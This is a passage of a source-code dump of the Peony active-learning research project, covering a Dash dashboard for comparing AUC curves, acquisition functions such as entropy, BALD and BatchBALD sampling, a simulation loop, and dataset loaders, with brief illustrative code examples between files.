198)\", dash=\"dash\", width=1),\n fill=\"toself\",\n fillcolor=\"rgba(234, 250, 241, 0.2)\",\n name=f\"Random Selection {model_1} mean\",\n showlegend=False,\n )\n )\n\n y_upper = auc_2_passive_mean + auc_2_passive_std\n y_lower = auc_2_passive_mean - auc_2_passive_std\n fig.add_trace(\n go.Scatter(\n x=list(range(200)) + list(range(200))[::-1],\n y=np.concatenate(\n [y_upper, y_lower[::-1]],\n ),\n line=dict(color=\"rgb(210, 180, 222)\", dash=\"dash\", width=1),\n fill=\"toself\",\n fillcolor=\"rgba(244, 236, 247, 0.2)\",\n name=f\"Random Selection {model_2} mean\",\n showlegend=False,\n )\n )\n\n fig.add_trace(\n go.Scatter(\n x=list(range(200)),\n y=auc_1_passive_mean,\n name=f\"Random Selection {model_1} mean\",\n line=dict(\n color=\"rgb(46, 204, 113)\",\n width=2,\n ),\n )\n )\n\n fig.add_trace(\n go.Scatter(\n x=list(range(200)),\n y=auc_2_passive_mean,\n name=f\"Random Selection {model_2} mean\",\n line=dict(\n color=\"rgb(165, 105, 189)\",\n width=2,\n ),\n )\n )\n\n # Active learning\n\n y_upper = auc_1_active_mean + auc_1_active_std\n y_lower = auc_1_active_mean - auc_1_active_std\n fig.add_trace(\n go.Scatter(\n x=list(range(200)) + list(range(200))[::-1],\n y=np.concatenate(\n [y_upper, y_lower[::-1]],\n ),\n line=dict(color=\"rgb(130, 224, 170)\", dash=\"dash\", width=1),\n fill=\"toself\",\n fillcolor=\"rgba(213, 245, 227, 0.5)\",\n name=f\"Random Selection {model_1} mean\",\n showlegend=False,\n )\n )\n\n y_upper = auc_2_active_mean + auc_2_active_std\n y_lower = auc_2_active_mean - auc_2_active_std\n fig.add_trace(\n go.Scatter(\n x=list(range(200)) + list(range(200))[::-1],\n y=np.concatenate(\n [y_upper, y_lower[::-1]],\n ),\n line=dict(color=\"rgb(187, 143, 206)\", dash=\"dash\", width=1),\n fill=\"toself\",\n fillcolor=\"rgba(232, 218, 239, 0.5)\",\n name=f\"Random Selection {model_2} mean\",\n showlegend=False,\n )\n )\n\n fig.add_trace(\n go.Scatter(\n x=list(range(200)),\n y=auc_1_active_mean,\n name=f\"Active Learning {model_1} mean\",\n line=dict(\n color=\"rgb(35, 155, 86)\",\n width=2,\n ),\n )\n )\n\n fig.add_trace(\n go.Scatter(\n x=list(range(200)),\n y=auc_2_active_mean,\n name=f\"Active Learning {model_2} mean\",\n line=dict(\n color=\"rgb(108, 52, 131)\",\n width=2,\n ),\n )\n )\n\n fig.update_layout(\n 
title_text=f\"{title} categories\",\n yaxis_title=\"AUC\",\n xaxis_title=\"Learning Iterations\",\n )\n\n fig.update_layout(\n height=500, width=1000, legend=dict(y=0.01, xanchor=\"right\", x=0.99)\n )\n\n return fig\n\n\ndef create_plot(categories_list, alg_1, alg_2):\n\n list_of_plots = []\n\n alg_legend_1 = \" \".join([token.capitalize() for token in alg_1.split(\"_\")[:2]])\n alg_legend_2 = \" \".join([token.capitalize() for token in alg_2.split(\"_\")[:2]])\n\n for index, categories_string in enumerate(categories_list):\n\n category_1, category_2 = [\n val.strip().upper()\n for val in re.sub(\"_\", \" \", categories_string).split(\"vs\")\n ]\n title_category = \" \".join(\n [category_1.capitalize(), \"Vs.\", category_2.capitalize()]\n )\n\n # Random acquisition function\n random_sampling_results_1 = get_res_from_db(\n alg_1, \"random\", category_1, category_2\n )\n random_sampling_results_2 = get_res_from_db(\n alg_2, \"random\", category_1, category_2\n )\n\n # Entropy acquisition function\n entropy_sampling_results_1 = get_res_from_db(\n alg_1, \"entropy\", category_1, category_2\n )\n entropy_sampling_results_2 = get_res_from_db(\n alg_2, \"entropy\", category_1, category_2\n )\n\n list_of_plots.append(\n dcc.Graph(\n id=f\"graph_{index}\",\n figure=visualize_auc_evolutions(\n random_sampling_results_1,\n random_sampling_results_2,\n entropy_sampling_results_1,\n entropy_sampling_results_2,\n alg_legend_1,\n alg_legend_2,\n title_category,\n ),\n )\n if all(\n [\n random_sampling_results_1,\n random_sampling_results_2,\n entropy_sampling_results_1,\n entropy_sampling_results_2,\n ]\n )\n else html.H5(f\"No data in Db found for {title_category} AUC visualization\")\n )\n\n return list_of_plots\n\n\napp.layout = html.Div(\n className=\"row\",\n children=[\n dcc.Store(id=\"visualized-categories\", storage_type=\"session\"),\n dcc.Store(id=\"tmp\", storage_type=\"session\"),\n html.Div(\n className=\"div-left-panel\",\n children=[\n # HEADLINE\n html.H5(\n children=\"Peony Visualization Component\",\n style={\"text-align\": \"center\"},\n ),\n # LOGO AND DESCRIPTION\n html.Div(\n className=\"div-info\",\n children=[\n html.Img(\n className=\"logo\",\n src=app.get_asset_url(\"peony-logo.png\"),\n ),\n html.P(\n \"\"\"\n This tool is made to visualize and compare different \n evolutions of the active learning algorythms. \n \"\"\",\n style={\"text-align\": \"center\"},\n ),\n ],\n ),\n # DROPDOWN\n html.Div(\n className=\"drop-downs\",\n children=[\n html.P(\n children=\"Available Categories\",\n style={\"text-align\": \"center\"},\n ),\n dcc.Dropdown(\n id=\"categories-dropdown\",\n options=[\n {\n \"label\": \"Crime Vs. Good News\",\n \"value\": \"crime_vs_good_news\",\n },\n {\n \"label\": \"Sports Vs. Comedy\",\n \"value\": \"sports_vs_comedy\",\n },\n {\n \"label\": \"Politics Vs. Business\",\n \"value\": \"politics_vs_business\",\n },\n {\n \"label\": \"Tech Vs. Science\",\n \"value\": \"tech_vs_science\",\n },\n {\n \"label\": \"College Vs. Education\",\n \"value\": \"college_vs_education\",\n },\n {\n \"label\": \"Positive Vs. 
Negative Tweets\",\n \"value\": \"positive_emotions_tweets_vs_negative_emotions_tweets\",\n },\n {\n \"label\": \"Reset\",\n \"value\": \"reset\",\n },\n ],\n clearable=False,\n style={\n \"width\": \"200pt\",\n },\n ),\n ],\n ),\n html.Div(\n children=[\n html.P(\n children=\"MongoDb Stored Algorithms\",\n style={\"text-align\": \"center\"},\n ),\n dcc.Dropdown(\n id=\"first-alg-dropdown\",\n options=[\n {\n \"label\": \" \".join(\n [token.capitalize() for token in key.split(\"_\")]\n ),\n \"value\": key,\n }\n for key in sorted(database_results.structurize_data())\n ],\n optionHeight=70,\n clearable=True,\n style={\n \"width\": \"100%\",\n \"display\": \"inline-block\",\n \"font-size\": \"100%\",\n },\n ),\n dcc.Dropdown(\n id=\"second-alg-dropdown\",\n options=[\n {\n \"label\": \" \".join(\n [token.capitalize() for token in key.split(\"_\")]\n ),\n \"value\": key,\n }\n for key in sorted(database_results.structurize_data())\n ],\n optionHeight=70,\n style={\n \"width\": \"100%\",\n \"display\": \"inline-block\",\n \"font-size\": \"100%\",\n \"align-items\": \"center\",\n },\n ),\n ],\n style={\n \"width\": \"200pt\",\n \"display\": \"inline-block\",\n \"margin-top\": \"20pt\",\n },\n ),\n ],\n style={\n \"width\": \"200pt\",\n \"display\": \"inline-block\",\n \"height\": \"2000pt\",\n },\n ),\n # RIGHT PANEL WITH CHARTS\n html.Div(\n id=\"charts\",\n className=\"learning-chart\",\n style={\n \"display\": \"inline-block\",\n \"horizontal-align\": \"right\",\n \"margin-left\": \"1%\",\n \"width\": \"100%\",\n },\n children=[\n dcc.Tabs(\n id=\"tabs\",\n value=\"tab-1\",\n children=[\n dcc.Tab(\n label=\"AUC Evolutions\",\n value=\"tab-1\",\n style=tab_style,\n selected_style=tab_selected_style,\n children=[\n html.Div(\n id=\"div-w-plots\",\n ),\n ],\n ),\n dcc.Tab(\n label=\"Additive Noise Results Fluctuation\",\n value=\"tab-2\",\n style=tab_style,\n selected_style=tab_selected_style,\n children=[\n html.Div(\n children=[\n html.H5(\n children=[\n \"Slide bar to visualize number of table columns\"\n ],\n style={\n \"text-align\": \"center\",\n \"margin-bottom\": \"10pt\",\n \"margin-top\": \"10pt\",\n },\n ),\n dcc.Slider(\n id=\"slider\",\n min=2,\n max=10,\n value=5,\n marks={\n str(i): str(i) for i in range(2, 11)\n },\n step=None,\n ),\n ],\n ),\n ],\n ),\n ],\n style={\"display\": \"flex\", \"width\": \"100%\"},\n colors={\n \"background\": \"black\",\n },\n ),\n html.Div(id=\"tabs-content-classes\"),\n ],\n ),\n ],\n style={\"display\": \"flex\"},\n)\n\n\ndef intro_page():\n return [\n html.Div(\n children=[\n html.H6(\n children=[\n \"\"\"\n Peony Visualization Component serves as an endpoint that queries MongoDb and visualizes machine learning results.\n The visualization component is implemented in Dash by PlotLy.\n \"\"\"\n ],\n style={\n # \"text-align\": \"center\",\n \"margin-bottom\": \"20pt\",\n \"margin-top\": \"40pt\",\n \"margin-right\": \"10%\",\n \"margin-left\": \"10%\",\n },\n ),\n html.Div(\n children=[\n html.Img(\n className=\"dash-mongo-logo\",\n src=app.get_asset_url(\"dash-mongo.png\"),\n style={\n \"height\": \"100%\",\n \"width\": \"100%\",\n # \"display\": \"inline-block\",\n },\n ),\n ],\n ),\n html.H6(\n children=[\n \"\"\"\n The tool allows a user to visualize AUC (Area Under ROC curve) evolutions and Additive Noise Fluctuations concerning different categories.\n \n Categories and results for different algorithms can be found in dropdown menus. \n\n Both plots and tables are interactive. Thus, a user can extract more information. 
Moreover, a user can also download a plot or a table. Peony Visualization Component serves as an endpoint that queries MongoDb and visualizes machine learning results.\n The visualization component is implemented in Dash by PlotLy.\n\n\n \"\"\"\n ],\n style={\n # \"text-align\": \"center\",\n \"margin-bottom\": \"20pt\",\n \"margin-top\": \"20pt\",\n \"margin-right\": \"10%\",\n \"margin-left\": \"10%\",\n },\n ),\n html.H6(\n children=[\"\"\"Author: Marko Sahan\"\"\"],\n style={\n \"margin-top\": \"40pt\",\n \"margin-right\": \"10%\",\n \"margin-left\": \"10%\",\n },\n ),\n html.A(\n \"Peony Project GitHub\",\n href=\"https://github.com/sahanmar/Peony/\",\n style={\n \"margin-right\": \"10%\",\n \"margin-left\": \"10%\",\n },\n ),\n ]\n )\n ]\n\n\[email protected](\n Output(\"tmp\", \"data\"),\n [\n Input(\"visualized-categories\", \"data\"),\n ],\n)\ndef create_temp_variable(categories):\n if categories is None: # isinstance(categories, dict):\n return [\"crime_vs_good_news\"]\n return categories\n\n\[email protected](\n [\n Output(\"tabs-content-classes\", \"children\"),\n Output(\"visualized-categories\", \"data\"),\n ],\n [\n Input(\"categories-dropdown\", \"value\"),\n Input(\"first-alg-dropdown\", \"value\"),\n Input(\"second-alg-dropdown\", \"value\"),\n Input(\"tabs\", \"value\"),\n Input(\"slider\", \"value\"),\n Input(\"tmp\", \"data\"),\n ],\n)\ndef update_figure(\n categories_string, first_alg, second_alg, tab, slider_val, categories\n):\n if tab == \"tab-1\":\n # Load tab one\n if categories_string is None or categories_string == \"reset\":\n return intro_page(), []\n if first_alg is None or second_alg is None:\n return intro_page(), []\n if categories_string not in categories:\n categories.append(categories_string)\n return create_plot(categories, first_alg, second_alg), categories\n else:\n # Load tab two\n if categories is None or first_alg is None or second_alg is None:\n return intro_page(), categories\n else:\n if categories_string is None or categories_string == \"reset\":\n return intro_page(), []\n if categories_string not in categories:\n categories.append(categories_string)\n alg_1_similar = find_similar_algorithms_in_db(first_alg)\n alg_2_similar = find_similar_algorithms_in_db(second_alg)\n return (\n [\n html.Div(\n id=f\"table_{index}\",\n children=[\n create_evloution_table(category, alg_1_similar, slider_val),\n create_evloution_table(category, alg_2_similar, slider_val),\n ],\n )\n for index, category in enumerate(categories)\n ],\n categories,\n )\n\n\nif __name__ == \"__main__\":\n app.run_server(\n host=os.getenv(\"localhost\", \"127.0.0.1\"),\n debug=True,\n dev_tools_ui=False,\n )\n"
},
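
The dashboard above keeps its state in `dcc.Store` components and rebuilds the page through callbacks. Stripped of the Peony layout, that Store-plus-callback pattern looks like this (minimal sketch, using the same old-style `dash_core_components` imports the app uses):

```python
import dash
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output, State

app = dash.Dash(__name__)
app.layout = html.Div(
    [
        dcc.Store(id="seen", storage_type="session"),
        dcc.Dropdown(id="pick", options=[{"label": c, "value": c} for c in ["a", "b"]]),
        html.Div(id="out"),
    ]
)

@app.callback(
    [Output("out", "children"), Output("seen", "data")],
    [Input("pick", "value")],
    [State("seen", "data")],
)
def remember_selection(value, seen):
    # Accumulate every picked value in the session store,
    # the same trick the Peony app uses for visualized categories.
    seen = seen or []
    if value and value not in seen:
        seen.append(value)
    return ", ".join(seen), seen

if __name__ == "__main__":
    app.run_server(debug=True)
```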
{
"alpha_fraction": 0.6534090638160706,
"alphanum_fraction": 0.654356062412262,
"avg_line_length": 32,
"blob_id": "84b809c98a849b30812ec6d2335889168378eafb",
"content_id": "43878c95ca79cba073c2f4fbf47e28c8da3365bb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1056,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 32,
"path": "/Peony_project/Peony_database/src/datasets/Comments_dataset.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import json\n\nfrom pathlib import Path\nfrom typing import Dict, List, Any\nfrom Peony_database.src.datasets.common import create_hash\nfrom tqdm import tqdm\n\n\nCOLLECTION_NAME = \"Comments_dataset\"\n\n\ndef transorm_data(record: Dict[str, Any]) -> Dict[str, Any]:\n transormed_record: dict = {}\n transormed_record[\"datasetName\"] = COLLECTION_NAME\n transormed_record[\"datasetId\"] = 4\n transormed_record[\"record\"] = {}\n transormed_record[\"record\"][\"id\"] = create_hash(\n [record[\"content\"], str(record[\"metadata\"][\"first_done_at\"])]\n )\n transormed_record[\"record\"][\"text\"] = {\"body\": record[\"content\"]}\n transormed_record[\"record\"][\"label\"] = record[\"annotation\"][\"labels\"]\n transormed_record[\"record\"][\"metadata\"] = {\n \"first_done_at\": record[\"metadata\"][\"first_done_at\"],\n \"last_updated_by\": record[\"metadata\"][\"last_updated_by\"],\n }\n return transormed_record\n\n\ndef load_data(path: Path) -> List[dict]:\n with open(path, \"r\") as f:\n lines = f.readlines()\n return [json.loads(line) for line in lines]\n"
},
{
"alpha_fraction": 0.6146710515022278,
"alphanum_fraction": 0.62095046043396,
"avg_line_length": 30.995433807373047,
"blob_id": "9e21492027eb30cd255b1619b3f122d19a6e856c",
"content_id": "d592ad9a76ca850e0129409fe7661e33373ace52",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7007,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 219,
"path": "/Peony_project/Peony_box/src/acquisition_functions/functions.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "from telnetlib import IP\nfrom tkinter.tix import Tree\nfrom matplotlib.pyplot import axis\nimport torch\n\nimport numpy as np\n\nfrom typing import Dict, Any, List, Callable\nfrom omegaconf import base\nfrom scipy.stats import entropy\nfrom sklearn.cluster import AgglomerativeClustering\n\nfrom itertools import combinations, product, count\n\nfrom tqdm import tqdm\n\nBASE = 2\nGUMBEL_BETA = 8\n\n\ndef random_sampling(labels: np.ndarray, batch_size: int) -> np.ndarray:\n labels = [np.argmax(l, axis=1) for l in labels]\n labels = np.mean(labels, axis=0)\n return np.random.randint(labels.shape[0], size=batch_size).astype(int)\n\n\ndef entropy_sampling(labels: np.ndarray, batch_size: int, instances: np.ndarray) -> np.ndarray:\n # instances are not used. They are given here in order to preserve unification\n\n dist_samples = len(labels)\n prediction_entropy = np.sum(entropy(labels, base=BASE, axis=2), axis=0) / dist_samples\n max_entropy_indices: List[int] = []\n\n for _ in range(batch_size):\n max_entropy_index = np.argmax(prediction_entropy)\n max_entropy_indices.append(max_entropy_index)\n prediction_entropy[max_entropy_index] = -np.inf\n\n return np.asarray(max_entropy_indices)\n\n\ndef batch_bald(labels: np.ndarray, batch_size: int, instances: np.ndarray) -> np.ndarray:\n\n nn_dist_sample_num = len(labels)\n idx_comb_2_return = []\n indices_to_iterate = list(range(len(labels[0])))\n\n print(\"Batch Bald sampling...\")\n for values_sampled in tqdm(range(1, batch_size + 1)):\n max_mutual_information = -np.inf\n for idx in indices_to_iterate:\n if idx in idx_comb_2_return:\n continue\n idx_comb = idx_comb_2_return.copy()\n idx_comb.append(idx)\n\n comb_labels = labels[:, idx_comb]\n\n expected_class_entropy = np.sum(entropy(comb_labels, base=BASE, axis=2)) / nn_dist_sample_num\n mutual_labels_prob_dist_entropy = entropy(\n [\n np.sum(\n [\n np.prod([sample[i] for sample, i in zip(nn_dist_sample, cartesian_comb)])\n for nn_dist_sample in comb_labels\n ],\n axis=0,\n )\n / nn_dist_sample_num\n for cartesian_comb in product(*[[0, 1] for i in range(values_sampled)])\n ],\n base=BASE,\n axis=0,\n )\n\n mutual_information = mutual_labels_prob_dist_entropy - expected_class_entropy\n\n if mutual_information > max_mutual_information:\n\n max_mutual_information = mutual_information\n max_inform_idx = idx\n\n idx_comb_2_return.append(max_inform_idx)\n\n return np.asarray(idx_comb_2_return)\n\n\ndef hac_sampling(\n labels: np.ndarray,\n batch_size: int,\n instances: np.ndarray,\n acq_func: Callable[[Any], np.ndarray],\n aggregate_sentence_embeds=True,\n criterion: str = \"size\",\n) -> np.ndarray:\n\n high_entropy_values = acq_func(labels, batch_size=10 * batch_size, instances=instances)\n\n if aggregate_sentence_embeds:\n instances = torch.stack([torch.mean(torch.stack(row, dim=0), dim=0) for row in instances], dim=0)\n\n model = AgglomerativeClustering(linkage=\"average\").fit(instances.cpu())\n cluster_tree = dict(enumerate(model.children_, model.n_leaves_))\n\n cluster_criterion = []\n high_entropy_clusters = {}\n for high_entropy_val_idx in high_entropy_values:\n for cluster, components in cluster_tree.items():\n if high_entropy_val_idx in components:\n high_entropy_clusters.setdefault(cluster, []).append(high_entropy_val_idx)\n if cluster not in cluster_criterion:\n cluster_criterion.append(cluster)\n\n if criterion == \"size\":\n cluster_criterion = [\n cluster\n for cluster, size in sorted(\n [(key, _get_cluster_sizes(key, cluster_tree)) for key in cluster_tree], key=lambda x: x[1]\n 
)\n ]\n\n ids_2_return = []\n for cluster_id in cluster_criterion:\n if len(ids_2_return) > batch_size:\n break\n if cluster_id in high_entropy_clusters and high_entropy_clusters[cluster_id]:\n index_to_add = high_entropy_clusters[cluster_id].pop(0)\n ids_2_return.append(index_to_add)\n\n if len(ids_2_return) > batch_size:\n print(f\"Smth went wrong, only {len(ids_2_return)} values sampled instead of {batch_size}\")\n\n return ids_2_return\n\n\ndef hac_entropy_sampling(\n labels: np.ndarray,\n batch_size: int,\n instances: np.ndarray,\n aggregate_sentence_embeds=True,\n criterion: str = \"size\",\n) -> np.ndarray:\n\n return hac_sampling(labels, batch_size, instances, entropy_sampling, aggregate_sentence_embeds, criterion)\n\n\ndef bald(labels: np.ndarray) -> np.ndarray:\n nn_dist_sample_num = len(labels)\n expected_class_entropy = np.sum(entropy(labels, base=BASE, axis=2), axis=0) / nn_dist_sample_num\n mutual_labels_prob_dist_entropy = entropy(\n [\n np.sum(labels[:, :, 0], axis=0) / nn_dist_sample_num,\n np.sum(labels[:, :, 1], axis=0) / nn_dist_sample_num,\n ],\n base=BASE,\n axis=0,\n )\n\n return mutual_labels_prob_dist_entropy - expected_class_entropy\n\n\ndef bald_sampling(labels: np.ndarray, batch_size: int, instances: np.ndarray) -> np.ndarray:\n # instances are not used. They are given here in order to preserve unification\n\n prediction_bald = bald(labels)\n max_bald_indices: List[int] = []\n\n for _ in range(batch_size):\n max_entropy_index = np.argmax(prediction_bald)\n max_bald_indices.append(max_entropy_index)\n prediction_bald[max_entropy_index] = -np.inf\n\n return np.asarray(max_bald_indices)\n\n\ndef hac_bald_sampling(\n labels: np.ndarray,\n batch_size: int,\n instances: np.ndarray,\n aggregate_sentence_embeds=True,\n criterion: str = \"size\",\n) -> np.ndarray:\n\n return hac_sampling(labels, batch_size, instances, bald_sampling, aggregate_sentence_embeds, criterion)\n\n\ndef power_bald(\n labels: np.ndarray,\n batch_size: int,\n instances: np.ndarray,\n) -> np.ndarray:\n max_power_bald_indices: List[int] = []\n\n num_labels = len(labels[0])\n\n bald_score = (\n np.log(\n bald(labels),\n )\n + np.random.gumbel(scale=1 / GUMBEL_BETA, size=num_labels)\n )\n\n for _ in range(batch_size):\n max_entropy_index = np.argmax(bald_score)\n max_power_bald_indices.append(max_entropy_index)\n bald_score[max_entropy_index] = -np.inf\n\n return np.asarray(max_power_bald_indices)\n\n\ndef _get_cluster_sizes(key: int, cluster_tree: Dict[int, np.ndarray]) -> int:\n cluster_size = 0\n for leaf in cluster_tree[key]:\n if leaf in cluster_tree:\n cluster_size += _get_cluster_sizes(leaf, cluster_tree)\n else:\n cluster_size += 1\n\n return cluster_size\n"
},
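
A concrete run of the `entropy_sampling` function above, on a toy pool: three stochastic forward passes over four unlabeled instances with two classes. Instance 2 sits closest to a 50/50 prediction, so it is queried first:

```python
import numpy as np
from scipy.stats import entropy

# shape (forward passes, instances, classes); probabilities are invented
labels = np.array(
    [
        [[0.9, 0.1], [0.6, 0.4], [0.5, 0.5], [0.2, 0.8]],
        [[0.8, 0.2], [0.7, 0.3], [0.45, 0.55], [0.1, 0.9]],
        [[0.95, 0.05], [0.65, 0.35], [0.55, 0.45], [0.3, 0.7]],
    ]
)
# mean predictive entropy per instance, exactly as in entropy_sampling above
mean_entropy = np.sum(entropy(labels, base=2, axis=2), axis=0) / len(labels)
print(np.argsort(-mean_entropy)[:2])  # [2 1]: most uncertain instances first
```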
{
"alpha_fraction": 0.6296107769012451,
"alphanum_fraction": 0.6296107769012451,
"avg_line_length": 40.16230392456055,
"blob_id": "0edbfad4b901abb74c22ab3ce64bfa44bc70acf0",
"content_id": "44357f8ac1b031be2cfd06a85ae29181d963352f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7862,
"license_type": "no_license",
"max_line_length": 201,
"num_lines": 191,
"path": "/Peony_project/Peony_box/active_learning_simulation/utils.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "from Peony_box.src.peony_box_model import PeonyBoxModel\n\nfrom Peony_box.src.utils import k_fold_corss_validation, auc_metrics\n\nimport numpy as np\nimport multiprocessing as mp\nimport argparse\n\nfrom IPython.utils import io\nfrom tqdm import tqdm\n\n\ndef reset_validation_data(testing_instances, testing_labels, new_training_indices):\n new_training_indices = new_training_indices.tolist()\n training_instances = [testing_instances[index] for index in new_training_indices]\n training_labels = [testing_labels[index] for index in new_training_indices]\n testing_instances = [\n testing_instances[index]\n for index in range(len(testing_instances))\n if index not in new_training_indices\n ]\n testing_labels = [\n testing_labels[index] for index in range(len(testing_labels)) if index not in new_training_indices\n ]\n\n return training_instances, training_labels, testing_instances, testing_labels\n\n\ndef active_learning_simulation(\n transformator,\n acquisition_function,\n active_learning_loops,\n max_active_learning_iters,\n active_learning_step,\n model,\n instances,\n labels,\n initial_training_data_size,\n transformation_needed,\n):\n\n # pool = mp.Pool(mp.cpu_count())\n\n # Repeat experiment for statistical validation\n # Return auc results for all runs and different active learning iteration\n\n # result = [pool.apply(active_learning_simulation_round, args = (transformator, acquisition_function, max_active_learning_iters, active_learning_step, model)) for _ in range(active_learning_loops)]\n\n # pool.close()\n\n return [\n active_learning_simulation_round(\n transformator,\n acquisition_function,\n max_active_learning_iters,\n active_learning_step,\n model,\n instances,\n labels,\n initial_training_data_size,\n transformation_needed,\n )\n for _ in tqdm(range(active_learning_loops))\n ]\n\n\ndef active_learning_simulation_round(\n transformator,\n acquisition_function,\n max_active_learning_iters,\n active_learning_step,\n model,\n instances,\n labels,\n initial_training_data_size,\n transformation_needed,\n):\n auc_active_learning_runs = []\n # Data preparation\n auc_active_learning = []\n\n training_instances = instances[:initial_training_data_size]\n training_labels = labels[:initial_training_data_size]\n\n testing_instances = instances[initial_training_data_size:]\n testing_labels = labels[initial_training_data_size:]\n\n # Active Learning Pipeline Run\n peony_model = PeonyBoxModel(\n transformator,\n active_learning_step=active_learning_step,\n acquisition_function=acquisition_function,\n )\n with io.capture_output() as captured: # suppressing output\n # Fit model with very little set of training data\n if model == \"svm\":\n peony_model.svm_model.fit(training_instances, training_labels, transformation_needed)\n elif model == \"nn\":\n peony_model.dropout_nn.fit(training_instances, training_labels, transformation_needed)\n elif model == \"bayesian_sgld\":\n peony_model.bayesian_sgld_nn.fit(training_instances, training_labels, transformation_needed)\n elif model == \"bayesian_denfi\":\n peony_model.bayesian_denfi_nn.fit(training_instances, training_labels, transformation_needed)\n elif model == \"bayesian_dropout\":\n peony_model.bayesian_dropout_nn.fit(training_instances, training_labels, transformation_needed)\n else:\n peony_model.random_forest_model.fit(training_instances, training_labels, transformation_needed)\n\n # Start active learning loop\n for _ in tqdm(range(max_active_learning_iters)):\n with io.capture_output() as captured: # suppressing output\n\n # predict 
the dataset complement for choosing next training data\n if model == \"svm\":\n predicted = peony_model.svm_model.predict(testing_instances, transformation_needed)\n elif model == \"nn\":\n predicted = peony_model.dropout_nn.predict(testing_instances, transformation_needed)\n elif model == \"bayesian_sgld\":\n predicted = peony_model.bayesian_sgld_nn.predict(testing_instances, transformation_needed)\n elif model == \"bayesian_denfi\":\n predicted = peony_model.bayesian_denfi_nn.predict(testing_instances, transformation_needed)\n elif model == \"bayesian_dropout\":\n predicted = peony_model.bayesian_dropout_nn.predict(testing_instances, transformation_needed)\n else:\n predicted = peony_model.random_forest_model.predict(testing_instances, transformation_needed)\n\n if transformation_needed:\n labels_for_auc = transformator.transform_labels(testing_labels[:])\n else:\n labels_for_auc = list(testing_labels[:])\n auc_active_learning.append(auc_metrics([{\"true\": labels_for_auc, \"predicted\": predicted}]))\n\n # Get indices based on acquisition function\n if model == \"svm\":\n indices = peony_model.svm_model.get_learning_samples(testing_instances, transformation_needed)\n elif model == \"nn\":\n indices = peony_model.dropout_nn.get_learning_samples(\n testing_instances, transformation_needed\n )\n elif model == \"bayesian_sgld\":\n indices = peony_model.bayesian_sgld_nn.get_learning_samples(\n testing_instances, transformation_needed\n )\n elif model == \"bayesian_denfi\":\n indices = peony_model.bayesian_denfi_nn.get_learning_samples(\n testing_instances, transformation_needed\n )\n elif model == \"bayesian_dropout\":\n indices = peony_model.bayesian_dropout_nn.get_learning_samples(\n testing_instances, transformation_needed\n )\n else:\n indices = peony_model.random_forest_model.get_learning_samples(\n testing_instances, transformation_needed\n )\n\n # Reset validation dataset (add training data, remove testing data)\n (\n training_instances,\n training_labels,\n testing_instances,\n testing_labels,\n ) = reset_validation_data(testing_instances, testing_labels, indices)\n\n # Add new learning samples to the model and retrain\n if model == \"svm\":\n peony_model.svm_model.add_new_learning_samples(\n training_instances, training_labels, transformation_needed\n )\n elif model == \"nn\":\n peony_model.dropout_nn.add_new_learning_samples(\n training_instances, training_labels, transformation_needed\n )\n elif model == \"bayesian_sgld\":\n peony_model.bayesian_sgld_nn.add_new_learning_samples(\n training_instances, training_labels, transformation_needed\n )\n elif model == \"bayesian_denfi\":\n peony_model.bayesian_denfi_nn.add_new_learning_samples(\n training_instances, training_labels, transformation_needed\n )\n elif model == \"bayesian_dropout\":\n peony_model.bayesian_dropout_nn.add_new_learning_samples(\n training_instances, training_labels, transformation_needed\n )\n else:\n peony_model.random_forest_model.add_new_learning_samples(\n training_instances, training_labels, transformation_needed\n )\n\n return auc_active_learning\n"
},
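
Underneath the model-specific branching, `active_learning_simulation_round` above is one loop: fit on a seed set, score the pool, query the acquisition function, move the queried samples into training, refit. The same loop with a plain sklearn classifier and least-confidence sampling standing in for the Peony models (a self-contained toy, not the project's code):

```python
import numpy as np
from sklearn.datasets import make_classification
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import roc_auc_score

X, y = make_classification(n_samples=500, random_state=0)
# seed the training set with a few examples of each class
train_idx = list(np.where(y == 0)[0][:5]) + list(np.where(y == 1)[0][:5])
pool_idx = [i for i in range(len(y)) if i not in set(train_idx)]

model = LogisticRegression(max_iter=1000)
for _ in range(20):
    model.fit(X[train_idx], y[train_idx])
    probs = model.predict_proba(X[pool_idx])[:, 1]
    print(round(roc_auc_score(y[pool_idx], probs), 3))  # AUC on the remaining pool
    # least-confidence acquisition: probability closest to 0.5
    query = np.argsort(np.abs(probs - 0.5))[:5]
    train_idx += [pool_idx[i] for i in query]
    pool_idx = [p for i, p in enumerate(pool_idx) if i not in set(query)]
```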
{
"alpha_fraction": 0.6522532105445862,
"alphanum_fraction": 0.6598072648048401,
"avg_line_length": 44.16470718383789,
"blob_id": "745d80d5154179fbbc3f7dc4dcee54aaf6896755",
"content_id": "aa4f07ce9e9158cecc489f59f4b75b01dd50a0ff",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3839,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 85,
"path": "/Peony_project/Peony_box/src/peony_box_model.py",
"repo_name": "sahanmar/Peony",
"src_encoding": "UTF-8",
"text": "import numpy as np\n\nfrom typing import Callable, Any, List, Dict, Any, Optional, Union\nfrom Peony_box.src.peony_adjusted_models.generalized_peony_box_model import (\n GeneralizedPeonyBoxModel,\n)\nfrom Peony_box.src.transformators.generalized_transformator import Transformator\nfrom Peony_box.src.peony_adjusted_models.random_trees_model import PeonyRandomForest\nfrom Peony_box.src.peony_adjusted_models.svm_model import PeonySVM\nfrom Peony_box.src.peony_adjusted_models.feed_forward_nn import PeonyFeedForwardNN\nfrom Peony_box.src.peony_adjusted_models.sgld_nn import PeonySGLDFeedForwardNN\nfrom Peony_box.src.peony_adjusted_models.denfi_nn import PeonyDENFIFeedForwardNN\nfrom Peony_box.src.peony_adjusted_models.dropout_nn import PeonyDropoutFeedForwardNN\n\n\nRAND_SAMPLES_RATIO = 0.7\nACQUISITION_FUNC_RATIO = 1\n\n\nclass PeonyBoxModel:\n def __init__(\n self,\n transformator: Transformator,\n acquisition_function: Optional[Callable[[np.ndarray, int], np.ndarray]] = None,\n greedy_coef_decay: 